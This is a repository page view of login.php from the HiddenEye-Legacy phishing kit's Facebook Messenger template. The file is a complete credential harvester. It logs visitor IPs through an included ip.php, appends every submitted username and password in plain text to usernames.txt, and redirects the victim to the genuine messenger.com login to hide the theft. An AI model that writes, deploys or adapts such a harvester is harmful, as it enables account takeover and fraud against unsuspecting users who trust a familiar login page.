HiddenEye-Legacy/WebPages/fb_messenger/login.php

7 lines
211 B
PHP
Raw Normal View History

2018-04-29 13:09:24 +08:00
<?php
2018-06-07 17:19:30 +08:00
include 'ip.php';
2018-04-29 17:53:13 +08:00
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://messenger.com/login.php');
2018-04-29 13:09:24 +08:00
exit();